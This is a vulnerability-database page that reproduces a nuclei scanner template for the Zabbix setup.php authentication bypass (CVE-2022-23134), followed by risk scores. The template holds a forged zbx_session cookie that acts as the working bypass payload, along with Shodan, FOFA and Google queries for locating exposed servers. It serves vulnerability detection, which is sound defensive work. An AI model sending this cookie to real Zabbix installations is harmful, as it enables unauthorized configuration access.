Lucene search
K

Zabbix Setup Configuration Authentication Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 57 Views

Zabbix Setup Authentication Bypass CVE-2022-2313

Related
Refs
Code
id: CVE-2022-23134

info:
  name: Zabbix Setup Configuration Authentication Bypass
  author: bananabr
  severity: medium
  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.
  remediation: |
    Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
  reference:
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
    - https://support.zabbix.com/browse/ZBX-20384
    - https://lists.fedoraproject.org/archives/list/[email protected]/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
    - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23134
    cwe-id: CWE-287,CWE-284
    epss-score: 0.84657
    epss-percentile: 0.99675
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2022,zabbix,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/zabbix/setup.php"
      - "{{BaseURL}}/setup.php"

    stop-at-first-match: true

    headers:
      Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Database"
          - "host"
          - "port"
          - "Zabbix"
        condition: and

      - type: word
        words:
          - "youtube_main"
          - "support.google.com"
        part: header
        condition: and
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b2e127e42204522940d581132463c9981defad24c5bbf4067164ae73d391bd1902210085c3691ed92aeac2e10a43a35b418520960579688775e1e85c8d008f1d73bb21:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.13.7 - 5.3
EPSS0.84657
SSVC
57